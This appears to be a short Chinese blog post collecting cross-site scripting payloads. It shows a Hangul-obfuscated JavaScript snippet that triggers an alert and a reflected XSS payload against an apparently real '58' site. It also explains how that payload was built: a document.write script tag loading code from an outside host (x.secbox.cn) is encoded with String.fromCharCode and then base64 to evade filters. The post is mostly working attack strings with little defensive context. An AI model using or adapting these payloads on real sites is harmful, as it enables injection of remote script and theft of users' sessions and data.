XSS收集

今天在朋友圈看到Wing发的

1
2
3
4
5
6
7
8
9
10
文件传输助手
<html>
<head>
<meta charset="utf-8">
</head>
<script>
([,하,,,,훌]=[]+{},[한,글,페,이,,로,드,ㅋ,,,ㅎ]=[!!하]+!하+하.ㅁ)
[훌+=하+ㅎ+ㅋ+한+글+페+훌+한+하+글][훌](로+드+이+글+한+'(45)')()
</script>
</html>

58某反射XSS

1
e1h9amF2YXNjcmlwdDpldmFsKFN0cmluZy5mcm9tQ2hhckNvZGUoMTAwLDExMSw5OSwxMTcsMTA5LDEwMSwxMTAsMTE2LDQ2LDExOSwxMTQsMTA1LDExNiwxMDEsNDAsMzksNjAsMTE1LDk5LDExNCwzOSw0MywzOSwxMDUsMTEyLDExNiw0NywxMTUsMTE0LDk5LDYxLDM0LDQ3LDQ3LDEyMCw0NiwxMTUsMTAxLDk5LDk4LDExMSwxMjAsNDYsOTksMTEwLDQ3LDEwOSw3OCw3Nyw4NCw5MCwxMDcsMzQsNjIsNjAsNDcsMTE1LDk5LDExNCwzOSw0MywzOSwxMDUsMTEyLDExNiw2MiwzOSw0MSw1OSwpKXtYfXhnb3tYfTA=&type=nk
  • 先把document.write('<scr'+'ipt/src="//x.secbox.cn/mNMTZk">scr'+'ipt>');用FromCharCode转成下面这样
1
{X}javascript:eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,39,43,39,105,112,116,47,115,114,99,61,34,47,47,120,46,115,101,99,98,111,120,46,99,110,47,109,78,77,84,90,107,34,62,60,47,115,99,114,39,43,39,105,112,116,62,39,41,59,)){X}xgo{X}0
  • 再base64编码得到最上面的